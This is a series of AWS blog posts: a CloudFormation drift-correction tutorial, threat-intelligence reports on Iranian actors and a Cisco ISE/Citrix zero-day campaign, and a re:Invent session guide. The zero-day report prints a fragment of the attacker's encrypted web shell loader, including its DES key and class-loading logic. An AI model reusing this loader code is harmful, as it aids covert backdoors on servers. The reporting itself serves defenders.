Story: Your team deploys a security group with only HTTP access via CloudFormation for compliance. During debugging, a developer adds SSH access (port 22) through the AWS Console for their IP address to troubleshoot an application issue. They forget to remove this rule after debugging. Later, security compliance requires reverting to the original template state. A standard change set shows no changes since the template is unchanged, but a drift-aware change set can detect and systematically remove the unauthorized SSH rule.

User journey: Create stack with HTTP-only access => Add SSH rule via console for debugging => Forget to remove SSH rule => Create drift-aware change set with REVERT_DRIFT mode => Review change set showing SSH rule removal => Execute change set to restore compliance

Scenario Flow

1. Create Stack

Deploy CloudFormation stack with security group allowing only HTTP traffic.

Figure 8

CloudFormation stack “sg-revert-drift-test” successfully deployed with DriftTestSecurityGroup resource

2. Make Unauthorized Changes (Console)

Manually add SSH ingress rule through AWS Console (simulating developer debugging access that wasn’t removed).

Figure 9: http only

Initial security group showing only HTTP (port 80) access as configured in template – compliant state

Figure 10: ssh-added

Security group now shows 2 permission entries: SSH (port 22) for specific IP and HTTP (port 80) for all traffic. The SSH rule creates drift and a compliance violation that needs systematic removal.

3. Create Drift-Aware Change Set

Create change set using REVERT_DRIFT mode to systematically remove the unauthorized SSH rule.

Figure 11

Creating drift-aware change set for security group compliance restoration. Note the “Drift aware change set” option is selected to compare with live state and detect unauthorized changes.

aws cloudformation create-change-set \
--stack-name sg-revert-drift-test \
--change-set-name revert-ssh-drift \
--use-previous-template \
--deployment-mode REVERT_DRIFT \
--region us-east-1

4. Review Change Set – Systematic Compliance Restoration

Examine the drift-aware change set to see systematic removal of unauthorized SSH rule.

Figure 12

Compliance violation detected: The drift -aware change set shows that the SSH rule in the live resource state (rule 232 for IP 15.248.7.53/32 on port 22) is not present in the proposed resource state derived from the template. This unauthorized SSH rule violates security policy and will be systematically removed

Key Insight: The drift-aware change set enables systematic compliance restoration by:

  • Previous template: Only HTTP (port 80) access – compliant state
  • Live resource state: HTTP + SSH (port 22) for 15.248.7.53/32 – compliance violation
  • Action: Remove unauthorized SSH rule to restore compliance

This provides a systematic, auditable way to remove unauthorized changes rather than manual cleanup.

Figure 13

Stack events showing successful execution of the drift-aware change set – SSH rule removed

CloudFormation Templates

security-group-drift-scenario.yaml:

Resources:
  DriftTestSecurityGroup:
    Type: AWS::EC2::SecurityGroup
    Properties:
      GroupDescription: "Security group for drift testing"
      SecurityGroupIngress:
        - IpProtocol: tcp
          FromPort: 80
          ToPort: 80
          CidrIp: 0.0.0.0/0
          Description: "Allow HTTP traffic for demo purposes"
      SecurityGroupEgress:
        - IpProtocol: -1
          CidrIp: 0.0.0.0/0
          Description: "Allow all outbound traffic"

CLI Commands

  1. Create stack:
aws cloudformation create-stack --stack-name sg-revert-drift-test --template-body file://security-group-drift-scenario.yaml --region us-east-1
  1. Get security group ID:
aws ec2 describe-security-groups --filters "Name=tag:aws:cloudformation:stack-name,Values=sg-revert-drift-test" --query 'SecurityGroups[0].GroupId' --output text --region us-east-1
  1. Create drift-aware change set:
aws cloudformation create-change-set --stack-name sg-revert-drift-test --change-set-name revert-ssh-drift --template-body file://security-group-drift-scenario.yaml --deployment-mode REVERT_DRIFT --region us-east-1
  1. Describe change set:
aws cloudformation describe-change-set --change-set-name revert-ssh-drift --stack-name sg-revert-drift-test --region us-east-1

Scenario 3: Recreate Deleted Resources

This scenario demonstrates drift detection when a dependent resource (logs bucket) is accidentally deleted outside of CloudFormation during troubleshooting. The main application bucket depends on this logs bucket for access logging. You need to recreate the deleted resource while maintaining the existing infrastructure dependencies.

Story: Your team deploys a main S3 bucket with a dependent logs bucket for access logging via CloudFormation. During troubleshooting, an operator accidentally deletes the logs bucket through the AWS Console. The main bucket still exists but its logging configuration now references a non-existent bucket. You need to recreate the deleted logs bucket while maintaining the dependency relationship.

User journey: Create stack with main and logs buckets => Accidentally delete logs bucket => Create drift-aware change set with REVERT_DRIFT mode => Review change set showing LogBucket will be recreated => Execute change set to restore deleted resource

Scenario Flow

1. Create Stack

Deploy CloudFormation stack with main S3 bucket and dependent logs bucket.

Figure 14

CloudFormation stack “s3-deletion-drift-test” successfully deployed with both LogBucket and MainBucket resources in CREATE_COMPLETE status

2. Accidental Deletion (Console)

Manually delete the logs bucket through AWS Console (simulating accidental deletion during troubleshooting).

Figure 15

LogBucket accidentally deleted outside of CloudFormation during troubleshooting, creating drift – the MainBucket still exists but its logging configuration now references a non-existent bucket

3. Create Drift-Aware Change Set

Create change set using REVERT_DRIFT mode to recreate the deleted LogBucket.

Figure 16

Creating drift-aware change set with “Drift aware change set” option selected to detect and recreate the deleted resource by comparing template with live state

aws cloudformation create-change-set \
--stack-name s3-deletion-drift-test \
--change-set-name recreate-deleted-bucket \
--use-previous-template \
--deployment-mode REVERT_DRIFT \
--region us-east-1

4. Review Change Set – Resource Recreation

Examine change set to see LogBucket recreation while preserving MainBucket dependencies.

Figure 17

Change set preview showing LogBucket will be recreated to restore the deleted resource and MainBucket updated to maintain infrastructure dependencies

Key Insight: The drift-aware change set detects that:

  • Template expectation: Both LogBucket and MainBucket should exist
  • Live resource state: Only MainBucket exists, LogBucket is missing
  • Action: Recreate LogBucket with original configuration to restore logging functionality

This enables systematic recovery of accidentally deleted resources while maintaining infrastructure dependencies.

CloudFormation Templates

s3-drift-scenario.yaml:

Resources:
  LogBucket:
    Type: AWS::S3::Bucket
    Properties:
      BucketEncryption:
        ServerSideEncryptionConfiguration:
          - ServerSideEncryptionByDefault:
              SSEAlgorithm: AES256
      PublicAccessBlockConfiguration:
        BlockPublicAcls: true
        BlockPublicPolicy: true
        IgnorePublicAcls: true
        RestrictPublicBuckets: true
      VersioningConfiguration:
        Status: Enabled
  
  MainBucket:
    Type: AWS::S3::Bucket
    Properties:
      BucketEncryption:
        ServerSideEncryptionConfiguration:
          - ServerSideEncryptionByDefault:
              SSEAlgorithm: AES256
      PublicAccessBlockConfiguration:
        BlockPublicAcls: true
        BlockPublicPolicy: true
        IgnorePublicAcls: true
        RestrictPublicBuckets: true
      VersioningConfiguration:
        Status: Enabled
      LoggingConfiguration:
        DestinationBucketName: !Ref LogBucket

CLI Commands

  1. Create stack:
aws cloudformation create-stack --stack-name s3-deletion-drift-test --template-body file://s3-drift-scenario.yaml --region us-east-1
  1. Get LogBucket name:
aws cloudformation describe-stack-resources --stack-name s3-deletion-drift-test --logical-resource-id LogBucket --query 'StackResources[0].PhysicalResourceId' --output text --region us-east-1
  1. Create drift-aware change set:
aws cloudformation create-change-set --stack-name s3-deletion-drift-test --change-set-name recreate-deleted-bucket --template-body file://s3-drift-scenario.yaml --deployment-mode REVERT_DRIFT --region us-east-1
  1. Describe change set:
aws cloudformation describe-change-set --change-set-name recreate-deleted-bucket --stack-name s3-deletion-drift-test --region us-east-1

Best Practices

When working with drift-aware change sets, consider these best practices:

Always review three-way comparisons before executing change sets to understand the full impact

Use REVERT_DRIFT deployment mode when you want to bring resources back to template compliance

Document emergency changes made outside of CloudFormation to inform future template updates

Implement change management processes to minimize unauthorized drift

Regular drift detection helps identify configuration changes before they become problematic

Test drift-aware change sets in non-production environments first

Cleanup

Important: Execute these cleanup commands promptly after completing the scenarios to avoid incurring unnecessary AWS charges. Resources such as Lambda functions, S3 buckets (even if empty), and security groups may incur costs if left running. Ensure all stacks are successfully deleted by verifying the DELETE_COMPLETE status.

Commands to delete all test resources:

# Scenario 1: Lambda Memory Drift
aws cloudformation delete-stack --stack-name lambda-memory-drift-test --region us-east-1

# Scenario 2: Security Group Drift
aws cloudformation delete-stack --stack-name sg-revert-drift-test --region us-east-1

# Scenario 3: S3 Bucket Deletion Drift
aws cloudformation delete-stack --stack-name s3-deletion-drift-test --region us-east-1

# Verify all stacks are deleted
aws cloudformation list-stacks --stack-status-filter DELETE_COMPLETE --region us-east-1

Note: CloudFormation will automatically clean up all resources created by the stacks, including Lambda functions, security groups, and S3 buckets.

Conclusion

Drift-aware change sets enable you to mitigate the operational and security risks of configuration drift, allowing you to confidently automate and govern your infrastructure updates with CloudFormation. Through the scenarios described in this post, you have seen how you can leverage drift-aware change sets to prevent outages in production environments, maintain the integrity of your test environments, and manage the compliance posture of all environments. Remember to thoroughly review the infrastructure changes previewed by drift-aware change sets before executing deployments.

Available Now

Drift-aware change sets are available in AWS Regions where CloudFormation is available. Please refer to the AWS Region table to learn more.

New Amazon Threat Intelligence findings: Nation-state actors bridging cyber and kinetic warfare

Post Syndicated from CJ Moses original https://aws.amazon.com/blogs/security/new-amazon-threat-intelligence-findings-nation-state-actors-bridging-cyber-and-kinetic-warfare/

The new threat landscape

The line between cyber warfare and traditional kinetic operations is rapidly blurring. Recent investigations by Amazon threat intelligence teams have uncovered a new trend that they’re calling cyber-enabled kinetic targeting in which nation-state threat actors systematically use cyber operations to enable and enhance physical operations. Traditional cybersecurity frameworks often treat digital and physical threats as separate domains. However, research by Amazon demonstrates that this separation is increasingly artificial. Multiple nation-state threat groups are pioneering a new operational model where cyber reconnaissance directly enables kinetic targeting.

We’re seeing a fundamental shift in how nation-state actors approach warfare. These aren’t just cyber attacks that happen to cause physical damage; they are coordinated campaigns where digital operations are specifically designed to support physical military objectives.

Unique visibility at Amazon

The ability of Amazon Threat Intelligence to identify these campaigns stems from their unique position in the global threat landscape:

  • Threat intelligence telemetry: Amazon global cloud operations provide visibility into threats across diverse environments, including intelligence from Amazon MadPot honeypot systems, which enable the detection of suspicious patterns, actor infrastructure, and the network pathways used in these cyber-enabled kinetic targeting campaigns.
  • Opt-in customer data: Real-world data about attempted threat actor activities provided on an opt-in basis from enterprise environments.
  • Industry partner collaboration: Threat intelligence sharing with leading security organizations and government agencies provides additional context and validation for observed activities.

Through this multi-source approach, Amazon can connect dots that might otherwise remain invisible to individual organizations or even government agencies operating in isolation.

Case study 1: Imperial Kitten’s maritime campaign

The first case study involves Imperial Kitten, a threat group suspected of operating on behalf of Iran’s Islamic Revolutionary Guard Corps (IRGC). The timeline reveals the progression from digital reconnaissance to physical attack:

  • December 4, 2021: Imperial Kitten compromises a maritime vessel’s Automatic Identification System (AIS) platform, gaining access to critical shipping infrastructure. The Amazon Threat Intelligence team identifies the compromise and works with the affected organization to remediate the security event.
  • August 14, 2022: The threat actor expands their maritime targeting of additional vessel platforms. In one incident, they gained access to CCTV cameras aboard a maritime vessel, which provided real-time visual intelligence.
  • January 27, 2024: Imperial Kitten conducts targeted searches for AIS location data for a specific shipping vessel. This represents a clear shift from broad reconnaissance to targeted intelligence gathering.
  • February 1, 2024: US Central Command reports a missile strike by Houthi forces against the exact vessel that Imperial Kitten had been tracking. While the missile strike was ultimately ineffective, the correlation between the cyber reconnaissance and kinetic strike is unmistakable.

This case demonstrates how cyber operations can provide adversaries with the precise intelligence needed to conduct targeted physical attacks against maritime infrastructure—a critical component of global commerce and military logistics.

Case study 2: MuddyWater’s Jerusalem operations

The second case study involves MuddyWater, a threat group attributed by the US government to Rana Intelligence Computer Company, operating at the behest of Iran’s Ministry of Intelligence and Security (MOIS). This case reveals an even more direct connection between cyber operations and kinetic targeting.

  • May 13, 2025: MuddyWater provisions a server specifically for cyber network operations, establishing the infrastructure needed for their campaign.
  • June 17, 2025: The threat actor uses their server infrastructure to access another compromised server containing live CCTV streams from Jerusalem. This provides real-time visual intelligence of potential targets within the city.
  • June 23, 2025: Iran launches widespread missile attacks against Jerusalem. On the same day, Israeli authorities report that Iranian forces were exploiting compromised security cameras to gather real-time intelligence and adjust missile targeting.

The timing is not coincidental. As reported by The Record, Israeli officials urged citizens to disconnect internet-connected security cameras, warning that Iran was exploiting them to “gather real-time intelligence and adjust missile targeting.”

Technical infrastructure and methods

Research by Amazon reveals the sophisticated technical infrastructure supporting these operations. The threat actors employ a multi-layered approach:

  1. Anonymizing VPN networks: Threat actors route their traffic through anonymizing VPN services to obscure their true origins and make attribution more difficult.
  2. Actor-controlled servers: Dedicated infrastructure provides persistent access and command-and-control capabilities for ongoing operations.
  3. Compromised enterprise systems: The ultimate targets—enterprise servers hosting critical infrastructure like CCTV systems, maritime platforms, and other intelligence-rich environments.
  4. Real-time data streaming: Live feeds from compromised cameras and sensors provide actionable intelligence that can be used to adjust targeting in near real time.

Defining a new category of warfare

The research team proposes new terminology to describe these hybrid operations. Traditional frameworks fall short:

  • Cyber-kinetic operations typically refer to cyber attacks that cause physical damage to systems
  • Hybrid warfare is too broad, encompassing multiple types of warfare without specific focus on the cyber-physical integration

Amazon researchers suggest cyber-enabled kinetic targeting as a more precise term for campaigns where cyber operations are specifically designed to enable and enhance kinetic military operations.

Implications for defenders

For the cybersecurity community, this research serves as both a warning and a call to action. Defenders must adapt their strategies to address threats that span both digital and physical domains. Organizations that historically believed they weren’t of interest to threat actors could now be targeted for tactical intelligence. We must expand our threat models, enhance our intelligence sharing, and develop new defensive strategies that account for the reality of cyber-enabled kinetic targeting across diverse adversaries.

  • Expanded threat modeling: Organizations must consider not just the direct impact of cyberattacks, but how compromised systems might be used to support physical attacks against themselves or others.
  • Critical infrastructure protection: Operators of maritime systems, urban surveillance networks, and other infrastructure must recognize that their systems might be valuable not just for espionage, but as targeting aids for kinetic operations.
  • Intelligence sharing: The cases demonstrate the critical importance of threat intelligence sharing between private sector organizations, government agencies, and international partners.
  • Attribution challenges: When cyber operations directly enable kinetic attacks, the attribution and response frameworks become more complex, potentially requiring coordination between cybersecurity, military, and diplomatic channels.

Looking forward

We believe that cyber-enabled kinetic targeting will become increasingly common across multiple adversaries. Nation-state actors are recognizing the force multiplier effect of combining digital reconnaissance with physical attacks. This trend represents a fundamental evolution in warfare, where the traditional boundaries between cyber and kinetic operations are dissolving.

Indicators of Compromise

IOC Value, IOC Type, First Seen, Last Seen, Annotation
18[.]219.14.54, IPv4, 2025-05-13, 2025-06-17, MuddyWater Command and Control IP address
85[.]239.63.179, IPv4, 2023-08-13, 2025-09-19, Imperial Kitten proxy IP address
37[.]120.233.84, IPv4, 2021-01-01, 2022-11-01, Imperial Kitten proxy IP address
95[.]179.207.105, IPv4, 2020-11-11, 2022-04-09, Imperial Kitten proxy IP address

This blog post is based on research presented at CYBERWARCON by David Magnotti, Principal Engineer, and Dlshad Othman, Senior Threat Intelligence Engineer, both of Amazon Threat Intelligence. The authors thank US Central Command for their transparency in reporting military activities and acknowledge the ongoing support of customers and partners in these critical investigations.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

CJ Moses

CJ Moses

CJ Moses is the CISO of Amazon Integrated Security. In his role, CJ leads security engineering and operations across Amazon. His mission is to enable Amazon businesses by making the benefits of security the path of least resistance. CJ joined Amazon in December 2007, holding various roles including Consumer CISO, and most recently AWS CISO, before becoming CISO of Amazon Integrated Security September of 2023.

Prior to joining Amazon, CJ led the technical analysis of computer and network intrusion efforts at the Federal Bureau of Investigation’s Cyber Division. CJ also served as a Special Agent with the Air Force Office of Special Investigations (AFOSI). CJ led several computer intrusion investigations seen as foundational to the security industry today.

CJ holds degrees in Computer Science and Criminal Justice, and is an active SRO GT America GT2 race car driver.

Know before you go – AWS re:Invent 2025 guide to Well-Architected and Cloud Optimization sessions

Post Syndicated from Anitha Selvan original https://aws.amazon.com/blogs/architecture/know-before-you-go-aws-reinvent-2025-guide-to-well-architected-and-cloud-optimization-sessions/

Are you ready to maximize your Well-Architected and Cloud Optimization learning and networking time at re:Invent 2025? We have put together this comprehensive guide to help you plan your schedule and make the most of the Well-Architected and cloud optimization sessions available this year. These sessions will deliver the practical guidance your teams need to lead strategic cloud initiatives, design next-generation architectures, optimize costs, or secure AI-powered systems.

Key themes at re:Invent for Well-Architected and Cloud Optimization – You can expect to see the following themes at re:Invent 2025

AI-powered architecture and governance

The sessions in this theme showcase how AWS is integrating AI technologies to transform traditional architectural practices. From using AI services for automated Well-Architected reviews to implementing self-evolving systems with agentic AI, these sessions demonstrate how you can use AI to automate architectural decisions, streamline governance processes, and scale best practices across the enterprise.

Sessions: ARC324-R, ARC317-R, SPS320, ARC302-R (session details are posted in the following section)

Well-Architected Framework evolution and implementation

These sessions highlight how the AWS Well-Architected Framework has evolved beyond its original scope to address modern architectural challenges. Attendees will learn how to implement the framework principles across different domains—from IoT security to backup strategies—while focusing on enterprise-scale governance and compliance.

Sessions: ARC204, SEC337, STG313-R, ARC323-R (session details are posted in the following section)

Cost optimization and FinOps

The cost optimization track focuses on innovative approaches to cloud financial management, with a strong emphasis on AI-powered FinOps solutions. Sessions range from hands-on workshops like the Frugal Architect GameDay to chalk talks on establishing effective cost governance models.

Sessions: ARC318-R, COP309-R, ARC309, DEV318 (session details are posted in the following section)

Session formats to fit your learning style

This year’s catalog features an exciting mix of content across different formats: from breakout, chalk talks, workshops, builder sessions to code talks.

Breakout sessions – Stay in the know

Sit back and enjoy these presentations to stay current with the latest solution enhancements and practical applications. AWS experts and guest speakers will share valuable insights and real-world examples.

From ideas to impact: Architecting with cloud best practices

ARC204 | Breakout session | December 1, 8:30 AM

Discover how foundational frameworks like the AWS Well-Architected Framework, AWS Cloud Adoption Framework, and AWS Cloud Operating Model evolved through customer feedback and real-world learnings from thousands of organizations, transforming from structured guidance into dynamic insights for optimizing cloud environments. Learn practical strategies for applying unified best practices to accelerate cloud transformation while managing large-scale architectural changes and maintaining operational excellence.

Build a well-architected foundation for scaling generative AI and agentic apps

AIM310 | Breakout session | December 1, 10:00 AM

Move beyond proof-of-concepts to build a production-ready foundation supporting all AI applications across your organization, addressing the critical transition from experimentation to enterprise-scale AI deployment. Navigate model access and management, tool discovery, memory and state handling, and observability at scale while building foundations that seamlessly integrate model access, orchestration workflows, agents, and tools with enterprise-grade governance controls.

AI-Powered Enterprise Architecture with ServiceNow & AWS 

ARC337-S | Breakout session | December 2, 3:00 PM

Enterprises face a core challenge: translating architectural vision into resilient cloud reality. See how integrating ServiceNow’s Enterprise Architecture Workspace with the AWS Well-Architected Tool transforms traditional design processes. Through elegant “shift-left” methodologies, architects gain contextual insights that seamlessly blend enterprise modeling with cloud best practices. This presentation is brought to you by ServiceNow, an AWS Partner.

The AI revolution in customer support: Building predictive service systems

SPS315 | Breakout session | December 3, 5:30 PM

Discover how AWS is using generative AI to transform customer support from reactive to proactive. We’ll show how large language models and AI agents are improving customer satisfaction and efficiency. Topics include smart case routing, context-aware support, early problem detection, and responsible AI use. We’ll share real results and discuss balancing AI capabilities with human touch.

Optimize AWS Costs: Developer Tools and Techniques

DEV318 | Breakout session | December 1, 3:00 PM

As cloud applications grow in complexity, optimizing costs becomes crucial for developers. This session explores AWS native tools and coding practices that reduce expenses without compromising performance or scalability.

Chalk talks

AWS speakers set the stage at the beginning of the talk and then open up for discussion. Bring your questions and dive deep into the topic with AWS experts and other customers.

Architecting agentic systems: Self-evolving patterns with AWS AI

ARC324-R | Chalk talk | December 2, 1:30 PM

Learn to architect self-evolving systems using agentic AI that align with AWS Well-Architected principles, exploring cutting-edge patterns for systems that adapt, heal, and optimize themselves autonomously while maintaining architectural integrity. Implement autonomous monitoring and self-healing capabilities with Amazon Bedrock Agents, design AI-driven security controls and automated recovery mechanisms and create systems that continuously adapt to workload patterns while maintaining reliability and performance standards.

Building Well-Architected agentic AI applications

ARC317-R/R1 | Chalk talk | December 2, 3:00 PM and December 4, 1:00 PM

Navigate generative AI agent development with robust architectural practices for security and compliance, focusing on proven patterns for building production-ready agentic AI applications that meet enterprise requirements. Design agent architectures with guardrails, monitoring systems, and access controls using the AWS Well-Architected Generative AI Lens while implementing governance patterns that ensure regulatory compliance and enable systems to scale from prototype to enterprise-wide deployment.

Using generative AI to automate architectural guidance

ARC315 | Chalk talk | December 1, 4:30 PM

Replace time-intensive manual processes with AI-powered systems that generate strategic recommendations, design principles, and best practices at scale while maintaining quality and consistency. Generate organization-specific design principles using AI analysis of architectural patterns, implement AI-driven guidance systems with effective quality control mechanisms, and build knowledge bases that feed AI-powered architectural guidance while maintaining human oversight and addressing ethical considerations.

Agentic architecting: From prototype to production-ready systems

ARC330-R/R1 | Chalk talk | December 2, 5:30PM and December 4, 2:30 PM

Transform prototypes into production-ready systems by incorporating security, monitoring, and CI/CD through agentic architecting, focusing on practical challenges of moving from experimental AI systems to production-grade architectures. Use AI agents to generate and optimize AWS CDK infrastructure and application code, implement automated security improvements and CI/CD pipeline creation, and maintain AWS Well-Architected principles while enabling teams to focus on business logic as AI handles infrastructure complexity.

AI-powered FinOps: Agent-based cloud cost management

ARC318-R/R1 | Chalk talk | December 1, 4:00 PM and December 3, 4:00 PM

Learn how intelligent agents tackle fragmented cost data and optimization processes in complex multi-account environments, moving beyond traditional FinOps approaches to autonomous, intelligent financial optimization. Architect solutions using Amazon OpenSearch Service for data aggregation and Amazon Bedrock for contextual reasoning to design secure, scalable FinOps solutions that continuously optimize costs while delivering measurable business outcomes.

Supercharge your well-architected reviews with AWS Generative AI

SPS320 | Chalk talk | December 3, 4:00 PM

Discover how Koch Industries revolutionized AWS Well-Architected reviews using generative AI, transforming weeks-long manual processes into automated, intelligent systems. Automate architectural assessments using Amazon Bedrock Knowledge Bases and Model Context Protocol (MCP) to scale best practice reviews and optimize workloads in minutes instead of days while achieving more comprehensive, consistent, and actionable recommendations through proven change management and organizational adoption strategies.

Architecting enterprise-scale governance beyond AWS Control Tower

ARC323-R/R1 | Chalk talk | December 3, 11:30 AM and December 4, 2:00PM

Discover advanced governance strategies that build upon AWS Control Tower for enterprise-scale environments requiring sophisticated compliance, security, and operational controls. Implement infrastructure across six Well-Architected Foundations capabilities with critical trade-off understanding, build efficient multi-account structures balancing security requirements with innovation needs, and architect automated compliance checks and policy enforcement at scale while enabling self-service capabilities with centralized governance and security controls.

Securing IoT Workloads with AWS IoT Lens and AWS Security Reference Architecture

SEC337 | Chalk talk | December 3, 11:30 AM

Industrial environments are reaching new levels of connectivity, automation, efficiency, and real-time data insights. However, this increased connectivity also introduces significant security challenges. Unaddressed security concerns can expose vulnerabilities and slow down companies looking to accelerate digital transformation using IoT and cloud. This chalk talk explores relevant techniques, architecture patterns, best practices and AWS security services for securing complex OT/IT environments, IoT devices, edge and cloud using the AWS Well-Architected IoT Lens and AWS Security Reference Architecture (SRA).

Establishing effective cost governance

COP309-R/R1 | Chalk talk | December 3, 3:00 PM and December 4, 12:30 PM

Generative AI agent development demands robust architectural practices for security and compliance. This chalk talk explores proven patterns for architecting secure, efficient AI agents using the AWS Well-Architected Generative AI Lens. Through collaborative discussion and whiteboarding, examine architectural governance and best practices for production environments. Learn to design agent architectures incorporating guardrails, monitoring systems, access controls, and sustainable deployment practices. Gain actionable insights for building secure, efficient, and cost-effective agentic AI applications that scale.

Break down monoliths, modernizing applications on Amazon ECS

CNS346 | Chalk talk | December 2, 4:30 PM

Join this interactive chalk talk to solve a common challenge where monolithic applications take months to deploy new features, and scaling becomes increasingly difficult. We’ll start with a real scenario, an application running on servers with a shared database. Together, we’ll design the modernization path using Amazon ECS and Well-Architected Framework principles. You’ll explore common architecture patterns, containerization strategies, CI/CD automation, and blue/green deployment approaches for ECS. After this session, you’ll walk away with a practical roadmap to transform your monolithic application into scalable microservices. Bring your curiosity and help us build the architecture live.

Hands-on workshop and Builders’ sessions

AWS speakers will introduce the use-case and tools designed to tackle the challenge. You will follow instructions, complete the tasks, and walk away with better understanding of the capabilities.

AI-powered Well-Architected reviews: Building automated governance

ARC302-R | Builders’ session | December 1, 9:00 AM; December 2, 11:30 AM and December 3, 4:00 PM

Build intelligent systems that automate AWS Well-Architected Framework reviews using generative AI, transforming manual architectural assessments into continuous, intelligent governance processes. Evaluate architecture against Well-Architected pillars while incorporating organization-specific requirements, implement continuous analysis of architecture and infrastructure as code templates, and enhance AI understanding of architectural context using Model Context Protocol servers to transform time-intensive reviews into scalable, automated processes with consistent governance.

AI-powered troubleshooting: From chaos to Well-Architected

ARC301-R | Builders’ session | December 1, 8:30 AM; December 2, 3:00 PM and December 3, 10:00 AM

Tackle complex scenarios using AI-powered tools to diagnose and resolve architectural problems, gaining practical experience using AI to transform poorly designed systems into well-architected solutions. Troubleshoot and optimize architectures with scaling bottlenecks and database inefficiencies using Amazon Q, apply Well-Architected principles to enhance performance and security under pressure, and accelerate problem identification and resolution while building AWS optimization expertise and learning to identify architectural anti-patterns before they become critical issues.

The Frugal Architect GameDay: Building cost-aware architectures

ARC309 | Workshop | December 1, 8:00 AM

Compete to implement cost efficiency improvements across multiple AWS services in this interactive GameDay, applying the Laws of the Frugal Architect to real-world scenarios for practical experience in transforming high-cost infrastructure into efficient, sustainable architectures. Address challenges spanning compute, networking, storage, serverless, and observability domains while learning to reduce cloud unit costs and improve profitability without compromising service quality through gamified scenarios that build rapid cost optimization decision-making skills.

Optimize AWS Backup using AI evaluation and Well-Architected best practices

STG313-R | Builders’ session | December 2, 1:30 PM and December 3, 8:30 AM

Enhance AWS Backup implementation using the AWS Backup Evaluator Solution, an AI agent that synthesizes data from multiple sources to provide intelligent backup optimization recommendations. Assess backup environments against the Well-Architected AWS Backup lens using Strands Agents SDK, create unified visibility across backup landscapes to identify optimization opportunities, and implement AI agents that continuously monitor backup efficiency while aligning with AWS best practices to enhance efficiency and cost-effectiveness.


Visit the AWS Cloud Support kiosk in the Venetian

Important notes:

Session dates, times, and locations listed in the post are subject to change as we continue to optimize the schedule on session popularity and venue capacity. Please check this blog post and the re:Invent session catalog regularly for the most up-to-date information about your registered sessions and newly added activities. For a full view of Well-architected content, including sessions with partners, explore the AWS re:Invent catalog and filter on the Well-Architected Framework area of interest.

Remember to reserve your seats early as popular sessions fill up quickly and bring your laptop for hands-on builders’ sessions and workshops. Register today


About the authors

Amazon discovers APT exploiting Cisco and Citrix zero-days

Post Syndicated from CJ Moses original https://aws.amazon.com/blogs/security/amazon-discovers-apt-exploiting-cisco-and-citrix-zero-days/

The Amazon threat intelligence teams have identified an advanced threat actor exploiting previously undisclosed zero-day vulnerabilities in Cisco Identity Service Engine (ISE) and Citrix systems. The campaign used custom malware and demonstrated access to multiple undisclosed vulnerabilities. This discovery highlights the trend of threat actors focusing on critical identity and network access control infrastructure—the systems enterprises rely on to enforce security policies and manage authentication across their networks.

Initial discovery

Our Amazon MadPot honeypot service detected exploitation attempts for the Citrix Bleed Two vulnerability (CVE-2025-5777) prior to public disclosure, indicating a threat actor had been exploiting the vulnerability as a zero-day. Through further investigation of the same threat exploiting the Citrix vulnerability, Amazon Threat Intelligence identified and shared with Cisco an anomalous payload targeting a previously undocumented endpoint in Cisco ISE that used vulnerable deserialization logic. This vulnerability, now designated as CVE-2025-20337, allowed the threat actors to achieve pre-authentication remote code execution on Cisco ISE deployments, providing administrator-level access to compromised systems. What made this discovery particularly concerning was that exploitation was occurring in the wild before Cisco had assigned a CVE number or released comprehensive patches across all affected branches of Cisco ISE. This patch-gap exploitation technique is a hallmark of sophisticated threat actors who closely monitor security updates and quickly weaponize vulnerabilities.

Custom web shell deployment

Following successful exploitation, the threat actor deployed a custom web shell disguised as a legitimate Cisco ISE component named IdentityAuditAction. This wasn’t typical off-the-shelf malware, but rather a custom-built backdoor specifically designed for Cisco ISE environments. The web shell demonstrated advanced evasion capabilities. It operated completely in-memory, leaving minimal forensic artifacts, used Java reflection to inject itself into running threads, registered as a listener to monitor all HTTP requests across the Tomcat server, implemented DES encryption with non-standard Base64 encoding to evade detection, and required knowledge of specific HTTP headers to access.

The following is a snippet of the deserialization routine showing the actor’s extensive authentication to access their web shell:

if (matcher.find()) {
    requestBody = matcher.group(1).replace("*", "a").replace("$", "l");
    Cipher encodeCipher = Cipher.getInstance("DES/ECB/PKCS5Padding");
    decodeCipher = Cipher.getInstance("DES/ECB/PKCS5Padding");
    byte[] key = "d384922c".getBytes();
    encodeCipher.init(1, new SecretKeySpec(key, "DES"));
    decodeCipher.init(2, new SecretKeySpec(key, "DES"));
    byte[] data = Base64.getDecoder().decode(requestBody);
    data = decodeCipher.doFinal(data);
    ByteArrayOutputStream arrOut = new ByteArrayOutputStream();
    if (proxyClass == null) {
        proxyClass = this.defineClass(data);
    } else {
        Object f = proxyClass.newInstance();
        f.equals(arrOut);
        f.equals(request);
        f.equals(data);
        f.toString();
    }

Security implications

As previously noted, Amazon threat intelligence identified through our MadPot honeypots that the threat actor was exploiting both CVE-2025-20337 and CVE-2025-5777 as zero-days, and was indiscriminately targeting the internet with these vulnerabilities at the time of investigation. The campaign underscored the evolving tactics of threat actors targeting critical enterprise infrastructure at the network edge. The threat actor’s custom tooling demonstrated a deep understanding of enterprise Java applications, Tomcat internals, and the specific architectural nuances of the Cisco Identity Service Engine. The access to multiple unpublished zero-day exploits indicates a highly resourced threat actor with advanced vulnerability research capabilities or potential access to non-public vulnerability information.

Recommendations for security teams

For security teams, this serves as a reminder that critical infrastructure components like identity management systems and remote access gateways remain prime targets for threat actors. The pre-authentication nature of these exploits reveals that even well-configured and meticulously maintained systems can be affected. This underscores the importance of implementing comprehensive defense-in-depth strategies and developing robust detection capabilities that can identify unusual behavior patterns. Amazon recommends limiting access, through firewalls or layered access, to privileged security appliance endpoints such as management portals.

Vendor references

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

CJ Moses

CJ Moses

CJ Moses is the CISO of Amazon Integrated Security. In his role, CJ leads security engineering and operations across Amazon. His mission is to enable Amazon businesses by making the benefits of security the path of least resistance. CJ joined Amazon in December 2007, holding various roles including Consumer CISO, and most recently AWS CISO, before becoming CISO of Amazon Integrated Security September of 2023.

Prior to joining Amazon, CJ led the technical analysis of computer and network intrusion efforts at the Federal Bureau of Investigation’s Cyber Division. CJ also served as a Special Agent with the Air Force Office of Special Investigations (AFOSI). CJ led several computer intrusion investigations seen as foundational to the security industry today.

CJ holds degrees in Computer Science and Criminal Justice, and is an active SRO GT America GT2 race car driver.

Amazon Kinesis Data Streams launches On-demand Advantage for instant throughput increases and streaming at scale

Post Syndicated from Pratik Patel original https://aws.amazon.com/blogs/big-data/amazon-kinesis-data-streams-launches-on-demand-advantage-for-instant-throughput-increases-and-streaming-at-scale/

